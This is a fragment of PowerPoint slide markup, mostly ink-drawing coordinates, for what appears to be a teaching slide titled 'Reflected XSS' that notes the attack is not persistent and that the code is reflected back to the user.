                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1533886" y="882314"/>
                <a:ext cx="93600" cy="900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24886" y="873674"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1716046" y="878714"/>
                <a:ext cx="116640" cy="576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7406" y="870074"/>
                  <a:ext cx="134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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1964446" y="857114"/>
                <a:ext cx="87840" cy="864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55806" y="848474"/>
                  <a:ext cx="10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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2154526" y="840914"/>
                <a:ext cx="89640" cy="1548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45886" y="831914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F45A1A35-8585-4E0F-8173-6295136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04" y="365125"/>
            <a:ext cx="6886636" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r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7607C94-DAD3-468A-8795-4292A0891A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6467494" y="4674860"/>
            <a:ext cx="5739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rgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>not persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>exploit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-code just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„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reflected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“ back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user</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FF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de-AT" sz="20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D4CE603-A673-497E-9A02-7232103B4CE8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481EF7BC-56AB-49DF-9168-99541C5C782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C6DF9B6C-AF88-4117-BE7C-BE3E509C342B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6353431-2C8E-4E17-98A8-F575B0C81D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="2814200">
            <a:off x="574889" y="1950446"/>
            <a:ext cx="336960" cy="214560"/>
            <a:chOff x="2721526" y="1425194"/>
            <a:chExt cx="336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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2721526" y="1425194"/>
                <a:ext cx="201600" cy="214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12886" y="1416554"/>
                  <a:ext cx="21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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3031126" y="1617794"/>
                <a:ext cx="27360" cy="4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22486" y="1608794"/>
                  <a:ext cx="45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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11392512" y="2816594"/>
              <a:ext cx="36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383512" y="28075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FD42984-1DF0-482E-9162-40CA94F24DAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4959286" y="2641634"/>
            <a:ext cx="824760" cy="263160"/>
            <a:chOff x="4959286" y="2641634"/>
            <a:chExt cx="8247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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4959286" y="2721554"/>
                <a:ext cx="126720" cy="183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0286" y="2712554"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5160886" y="2885354"/>
                <a:ext cx="14040" cy="136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52246" y="2876354"/>
                  <a:ext cx="31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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5281126" y="2721194"/>
                <a:ext cx="21600" cy="108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2486" y="2712554"/>
                  <a:ext cx="3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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5273566" y="2641634"/>
                <a:ext cx="208440" cy="1666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4566" y="2632634"/>
                  <a:ext cx="226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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5483086" y="2675834"/>
                <a:ext cx="139320" cy="896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74086" y="2667194"/>
                  <a:ext cx="156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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5633566" y="2662154"/>
                <a:ext cx="150480" cy="1746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24566" y="2653154"/>
                  <a:ext cx="168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286C256F-FB33-4FF8-9BE2-19B7E4B2A50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5905726" y="2610674"/>
            <a:ext cx="1387800" cy="268560"/>
            <a:chOff x="5905726" y="2610674"/>
            <a:chExt cx="13878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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5905726" y="2665034"/>
                <a:ext cx="8280" cy="87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96726" y="2656394"/>
                  <a:ext cx="25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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5906446" y="2621474"/>
                <a:ext cx="27000" cy="79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97446" y="2612834"/>
                  <a:ext cx="44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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5978806" y="2643794"/>
                <a:ext cx="113760" cy="1130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0166" y="263515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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6137926" y="2669354"/>
                <a:ext cx="113400" cy="770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29286" y="2660714"/>
                  <a:ext cx="13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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6301006" y="2610674"/>
                <a:ext cx="55080" cy="1332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92366" y="2601674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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6398566" y="2756834"/>
                <a:ext cx="11880" cy="68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89566" y="274783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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6460486" y="2695994"/>
                <a:ext cx="47160" cy="1468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51846" y="2686994"/>
                  <a:ext cx="6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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6479926" y="2703914"/>
                <a:ext cx="105120" cy="720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70926" y="2694914"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6607726" y="2726594"/>
                <a:ext cx="70560" cy="597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98726" y="2717594"/>
                  <a:ext cx="8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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6671806" y="2721914"/>
                <a:ext cx="29520" cy="84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63166" y="2712914"/>
                  <a:ext cx="4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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6744166" y="2741354"/>
                <a:ext cx="57960" cy="4860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35526" y="2732714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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6720406" y="2761154"/>
                <a:ext cx="105120" cy="11592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11766" y="2752154"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6853966" y="2695634"/>
                <a:ext cx="72360" cy="1188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45326" y="2686994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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6933526" y="2775914"/>
                <a:ext cx="91080" cy="464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24526" y="2767274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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7042966" y="2786714"/>
                <a:ext cx="84600" cy="860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33966" y="2778074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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7158526" y="2811194"/>
                <a:ext cx="89640" cy="68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9886" y="2802554"/>
                  <a:ext cx="107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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7263646" y="2741354"/>
                <a:ext cx="29880" cy="12636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54646" y="2732714"/>
                  <a:ext cx="475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C680B792-8BD2-4360-8C7D-93BE15F8D760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10105512" y="3017474"/>
            <a:ext cx="194040" cy="184680"/>
            <a:chOff x="9832246" y="3017474"/>
            <a:chExt cx="194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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9832246" y="3017474"/>
                <a:ext cx="99360" cy="1825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23246" y="3008834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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10017646" y="3190274"/>
                <a:ext cx="8640" cy="118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09006" y="3181634"/>
                  <a:ext cx="26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1608AB3B-BCAC-49DC-B631-2DAC30B9883B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10349232" y="2942234"/>
            <a:ext cx="1729800" cy="239400"/>
            <a:chOff x="10075966" y="2942234"/>
            <a:chExt cx="17298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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10075966" y="3073274"/>
                <a:ext cx="105120" cy="1083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67326" y="3064274"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10219606" y="3085874"/>
                <a:ext cx="143640" cy="9288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10606" y="3077234"/>
                  <a:ext cx="16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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10399246" y="2992634"/>
                <a:ext cx="103680" cy="1706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0606" y="2983634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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10553686" y="3084074"/>
                <a:ext cx="77400" cy="824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5046" y="3075074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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10654126" y="3003434"/>
                <a:ext cx="174960" cy="1544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45126" y="2994434"/>
                  <a:ext cx="19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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10932046" y="3043394"/>
                <a:ext cx="106560" cy="1306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3046" y="3034394"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11081806" y="3038354"/>
                <a:ext cx="77400" cy="7704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72806" y="3029354"/>
                  <a:ext cx="95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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11169286" y="3053474"/>
                <a:ext cx="16560" cy="6804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60646" y="3044474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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11220406" y="3044834"/>
                <a:ext cx="62280" cy="396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211406" y="3035834"/>
                  <a:ext cx="79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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11216446" y="3055634"/>
                <a:ext cx="93600" cy="1206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07446" y="3046994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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11344246" y="2948714"/>
                <a:ext cx="70560" cy="1616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35246" y="2940074"/>
                  <a:ext cx="88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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11414086" y="3046634"/>
                <a:ext cx="86040" cy="6480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05446" y="3037634"/>
                  <a:ext cx="10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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11554126" y="3038714"/>
                <a:ext cx="63360" cy="594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45126" y="3029714"/>
                  <a:ext cx="81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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11616046" y="3052034"/>
                <a:ext cx="50760" cy="763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607046" y="3043034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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11666446" y="3048434"/>
                <a:ext cx="84600" cy="7236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57806" y="3039434"/>
                  <a:ext cx="102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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11747806" y="2942234"/>
                <a:ext cx="57960" cy="16380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38806" y="2933594"/>
                  <a:ext cx="75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3F0BA190-5CFD-46F3-A381-95328ACE65ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5064046" y="3459194"/>
            <a:ext cx="233640" cy="161640"/>
            <a:chOff x="5064046" y="3459194"/>
            <a:chExt cx="233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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5064046" y="3459194"/>
                <a:ext cx="138240" cy="1292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55046" y="3450554"/>
                  <a:ext cx="155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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5149366" y="3507434"/>
                <a:ext cx="23760" cy="11340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40366" y="3498434"/>
                  <a:ext cx="41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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5285806" y="3598874"/>
                <a:ext cx="11880" cy="72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6806" y="3590234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FC1F305B-981E-4EC0-A5B8-E17E173C81BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5358886" y="3316634"/>
            <a:ext cx="2440080" cy="349920"/>
            <a:chOff x="5358886" y="3316634"/>
            <a:chExt cx="244008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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5358886" y="3529034"/>
                <a:ext cx="81720" cy="9108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9886" y="3520034"/>
                  <a:ext cx="9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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5436286" y="3529034"/>
                <a:ext cx="105120" cy="810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27646" y="3520394"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5572006" y="3404834"/>
                <a:ext cx="66600" cy="2491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63006" y="3395834"/>
                  <a:ext cx="84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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5537086" y="3504194"/>
                <a:ext cx="85680" cy="234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28446" y="3495194"/>
                  <a:ext cx="103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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5660926" y="3406994"/>
                <a:ext cx="74880" cy="1749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51926" y="3398354"/>
                  <a:ext cx="9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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5754526" y="3503474"/>
                <a:ext cx="55440" cy="75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45526" y="3494474"/>
                  <a:ext cx="7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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5855326" y="3489794"/>
                <a:ext cx="82080" cy="64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6326" y="3481154"/>
                  <a:ext cx="9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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5952166" y="3395474"/>
                <a:ext cx="35280" cy="1666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43526" y="3386834"/>
                  <a:ext cx="5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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5921206" y="3478274"/>
                <a:ext cx="89640" cy="2304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12566" y="3469274"/>
                  <a:ext cx="10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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6091846" y="3497714"/>
                <a:ext cx="97200" cy="16884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83206" y="3489074"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6228286" y="3498794"/>
                <a:ext cx="114840" cy="8064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9646" y="3489794"/>
                  <a:ext cx="13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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6347086" y="3480794"/>
                <a:ext cx="123840" cy="1558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38086" y="3472154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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6506926" y="3380714"/>
                <a:ext cx="62280" cy="16848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8286" y="3372074"/>
                  <a:ext cx="7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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6576766" y="3491954"/>
                <a:ext cx="84960" cy="6120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68126" y="3483314"/>
                  <a:ext cx="10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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6693046" y="3455954"/>
                <a:ext cx="67320" cy="813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84046" y="3447314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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6780166" y="3467834"/>
                <a:ext cx="84240" cy="7056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71166" y="3459194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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6875206" y="3374234"/>
                <a:ext cx="23400" cy="1332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66206" y="3365594"/>
                  <a:ext cx="4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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7023166" y="3424634"/>
                <a:ext cx="7920" cy="8640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14166" y="3415634"/>
                  <a:ext cx="2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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7030726" y="3352634"/>
                <a:ext cx="4320" cy="2448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22086" y="334363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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7077166" y="3439754"/>
                <a:ext cx="74160" cy="558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8166" y="343111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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7244206" y="3316634"/>
                <a:ext cx="127440" cy="17028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35206" y="3307634"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7406926" y="3374234"/>
                <a:ext cx="101160" cy="1069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98286" y="3365594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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7535086" y="3363074"/>
                <a:ext cx="68400" cy="964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26086" y="3354434"/>
                  <a:ext cx="8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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7663246" y="3364154"/>
                <a:ext cx="81720" cy="14364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54246" y="3355154"/>
                  <a:ext cx="99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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7787086" y="3439754"/>
                <a:ext cx="11880" cy="68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78446" y="343111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8" name="Gewitterblitz 197">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E0902F4-1D4A-4096-9171-DCEE0118B644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3762186" y="3435974"/>
            <a:ext cx="496220" cy="64804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EFE39E35-A73F-4B9F-9AAF-8620867E9C3B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C055820A-B62B-463A-9736-BA3E9429064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675C6FFD-CA46-498D-BE74-BAA3A6DF6E84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9C363D30-548A-46D0-94A1-352D230B97FA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72905692-A2D3-4BC7-A66D-CB3F8AC5DD5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0CA437B7-468F-4F32-8F40-1BC513F292D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7F37F131-BADF-4810-A699-7C01364A81BC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942FA946-1C71-4797-B59F-7CA07EC68563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30207CAE-8C26-465B-9681-21187AC7719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4C19DD0-84CE-4FB0-8B47-F3B7A72B0BD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FC8ADFAE-A574-4C10-B8C7-7C6A42F682C0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210A1344-904A-403A-B8BD-1E46AC31508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461DABC-CB4E-4F7A-95C1-6D24EC7C4A02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477521AE-0748-4941-846D-CB795909DA7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5DCAB406-FED9-4082-AD31-8ECE662E59D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420D0260-6655-4853-AB7E-63FDED26F55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BF6259EB-E869-4E16-A182-C25D7A51A004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D730F54-E96B-4406-A97F-2ACD9F0B366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5F02F32D-2E31-4036-9AA5-B62A1789DBB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E44C7471-7BC6-42A8-B977-9B42C694AE1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FEEA8A4-DB80-4AA0-A5A8-4FABD99F824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7BE53DF5-8028-482C-B538-F90317BB63CD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FFA214C0-EA8C-4B74-8B17-16ED9E702B1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EE76C72D-3E7B-4DA5-AD03-34D5F4375F07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11305C7-AAC3-4622-8602-478F3662515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5E5DB98-E716-4088-86A4-AD37872AFE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43E1ED8D-11C7-4C74-83E8-999DD4E358DB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CFA6BE5F-4F9C-480D-808C-A4335872CD44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A6C5CDE0-F918-4106-956A-D07492FB064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B9A5439F-3754-447E-99F3-B0062A7FD85B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E2B64F5-21B8-4160-BDD8-F4F7A24F5EFC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72598D8B-A202-4A9D-8769-A288F76E9EF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98560795-913B-400D-BE1D-A933B2D6F2D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2D0D822E-9A82-4EB6-98C3-D9742896E8B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C70F2A99-78F0-4FE5-9124-D9C77051DBA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E26584D2-A4DB-49D8-B14C-1E5606A86CE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31" name="Freihand 230">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E6F748-95FD-4B10-92F9-7963698CBA8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363848F7-4BB7-4F36-A816-F4D90B4493B1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33" name="Freihand 232">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A157FC-87A9-433C-8DFC-9CBE14BE397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106C53BB-38A1-4F5E-B67C-83D488215F6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057EF807-3E2C-4DB6-AA4D-81BF56DE095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2E83F75C-C768-4BF3-8AF1-4FD4485FB05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37" name="Freihand 236">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{969A62F1-584F-4F0F-BEF6-405D25CAD7B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4C87D154-FB95-4E85-9626-ED0AE0D1257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FA077AF7-9B77-4599-8BEF-C24A8A2B75A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3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6" grpId="0"/>
      <p:bldP spid="1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3886980"/>
            <a:ext cx="4253553" cy="2592591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FAB586D-72EF-470E-A89D-91EC7E4C022C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656095" y="424854"/>
            <a:chExt cx="1629720" cy="93672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9A69FD5-C9BA-478D-99A3-681992EBA07A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="656095" y="424854"/>
              <a:ext cx="1629720" cy="936720"/>
              <a:chOff x="1065608" y="369674"/>
              <a:chExt cx="1629720" cy="93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C9BAA366-AF6D-4946-94B4-B2A80239E879}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1065608" y="417194"/>
                  <a:ext cx="46800" cy="888480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns=""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0D1B89FF-8C8D-45C5-8837-9055BC1883F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56968" y="408554"/>
                    <a:ext cx="64440" cy="90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9C5CAD1F-F130-4C57-81A1-54E2BF95B304}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1119968" y="371114"/>
                  <a:ext cx="1480320" cy="6264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3085F9CD-51B8-4362-8D00-C832AA2EBA5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10968" y="362474"/>
                    <a:ext cx="149796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20603052-767B-4A8E-9378-C34AED14647D}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1085048" y="1257794"/>
                  <a:ext cx="1575720" cy="4860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A82FFF48-92CC-47C0-94E5-6C9F963FD96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76408" y="1248794"/>
                    <a:ext cx="159336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2B18454C-65D3-4F9F-B69F-01004FD597A5}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2617928" y="369674"/>
                  <a:ext cx="77400" cy="89064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E1513140-B5EF-417C-AC9E-74C1A6C90D6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609288" y="360674"/>
                    <a:ext cx="95040" cy="90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7E24BAE-5D20-4098-BCEA-9443374307E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="838615" y="547149"/>
              <a:ext cx="1353960" cy="245880"/>
              <a:chOff x="1248128" y="723194"/>
              <a:chExt cx="135396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8E303561-2809-4018-A4A1-8D43E7846174}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1248128" y="844874"/>
                  <a:ext cx="147600" cy="124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AD9C54D5-2DF8-4D1E-8238-E76727F4568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39128" y="835874"/>
                    <a:ext cx="16524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6C01D7EE-F64A-4F37-A7AC-CDE68D757D33}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1398968" y="723194"/>
                  <a:ext cx="17280" cy="235080"/>
                </p14:xfrm>
              </p:contentPart>
